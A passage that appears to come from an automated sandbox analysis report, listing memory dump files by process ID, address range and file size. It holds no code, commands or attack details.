                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              10.8MB

                                                                                                                                                                                                                                                                                                            • memory/3836-242-0x00007FFC85D70000-0x00007FFC86831000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              10.8MB

                                                                                                                                                                                                                                                                                                            • memory/3836-227-0x0000000000CB0000-0x0000000000CE6000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              216KB

                                                                                                                                                                                                                                                                                                            • memory/4368-162-0x0000000002DA3000-0x0000000002DAC000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                                                            • memory/4368-171-0x0000000000400000-0x0000000002BF1000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              39.9MB

                                                                                                                                                                                                                                                                                                            • memory/4368-164-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                                                            • memory/4368-146-0x0000000002DA3000-0x0000000002DAC000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                                                            • memory/4440-297-0x0000000075270000-0x0000000075485000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              2.1MB

                                                                                                                                                                                                                                                                                                            • memory/4440-301-0x00000000000E0000-0x0000000000294000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              1.7MB

                                                                                                                                                                                                                                                                                                            • memory/4440-323-0x0000000072180000-0x00000000721CC000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/4440-296-0x00000000010E0000-0x00000000010E1000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                            • memory/4440-291-0x00000000010C0000-0x00000000010C1000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                            • memory/4440-313-0x0000000075FE0000-0x0000000076593000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              5.7MB

                                                                                                                                                                                                                                                                                                            • memory/4440-295-0x00000000000E0000-0x0000000000294000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              1.7MB

                                                                                                                                                                                                                                                                                                            • memory/4440-304-0x00000000000E0000-0x0000000000294000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              1.7MB

                                                                                                                                                                                                                                                                                                            • memory/4440-306-0x0000000072700000-0x0000000072789000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              548KB

                                                                                                                                                                                                                                                                                                            • memory/4440-307-0x0000000002C70000-0x0000000002CB6000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              280KB

                                                                                                                                                                                                                                                                                                            • memory/4440-293-0x00000000000E0000-0x0000000000294000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              1.7MB

                                                                                                                                                                                                                                                                                                            • memory/4440-303-0x0000000070710000-0x0000000070EC0000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              7.7MB

                                                                                                                                                                                                                                                                                                            • memory/4828-294-0x0000000000A70000-0x0000000000AD0000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              384KB

                                                                                                                                                                                                                                                                                                            • memory/5128-299-0x00000000029B0000-0x00000000029B1000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                            • memory/5128-312-0x0000000002970000-0x0000000002971000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                            • memory/5128-298-0x00000000009B0000-0x0000000000A10000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              384KB

                                                                                                                                                                                                                                                                                                            • memory/5128-305-0x00000000029C0000-0x00000000029C1000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                            • memory/5200-311-0x0000000002410000-0x0000000002470000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              384KB

                                                                                                                                                                                                                                                                                                            • memory/5208-300-0x00000000007AF000-0x000000000081B000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              432KB

                                                                                                                                                                                                                                                                                                            • memory/5288-339-0x0000000000600000-0x0000000000620000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              128KB

                                                                                                                                                                                                                                                                                                            • memory/5392-327-0x000000000070D000-0x0000000000735000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              160KB

                                                                                                                                                                                                                                                                                                            • memory/5456-302-0x0000000000EA0000-0x0000000000EB4000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                                                            • memory/5472-308-0x0000000000582000-0x0000000000590000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              56KB

                                                                                                                                                                                                                                                                                                            • memory/5528-309-0x0000000000812000-0x0000000000862000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              320KB

                                                                                                                                                                                                                                                                                                            • memory/5564-315-0x0000000002A00000-0x0000000002A01000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                            • memory/5564-314-0x00000000024A0000-0x0000000002500000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              384KB

                                                                                                                                                                                                                                                                                                            • memory/5564-317-0x00000000027C0000-0x00000000027C1000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                            • memory/5564-316-0x00000000027B0000-0x00000000027B1000-memory.dmp
                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4KB